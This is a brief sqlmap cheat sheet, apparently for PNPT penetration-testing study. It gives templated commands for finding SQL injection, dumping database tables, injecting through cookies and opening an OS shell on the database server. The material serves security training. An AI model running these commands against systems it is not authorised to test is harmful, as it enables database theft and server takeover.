Automated URL Scan
Scan a target URL for SQL injection vulnerabilities and identify the backend database.
sqlmap -u "{{url}}" --batchScan from Request File
Use a saved HTTP request file (e.g., from Burp Suite) to test for injections in POST data or headers.
sqlmap -r {{request_file}} --level=2 --risk=1Dumping Database Content
Extract and dump all data from the identified database tables.
sqlmap -r {{request_file}} --dump
sqlmap -u "{{url}}" -D {{database_name}} -T {{table_name}} --dumpCookie-Based Injection
Specifically target session cookies for injection by increasing the scan level.
sqlmap -r {{request_file}} --level=2OS Shell Access
Attempt to gain an interactive operating system shell on the database server.
sqlmap -r {{request_file}} --os-shellDescription
SQLMap is an open-source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws. In PNPT, it is used to quickly identify vulnerable parameters, bypass authentication, and extract sensitive data from backend databases. It can also be leveraged for remote command execution if the database configuration allows.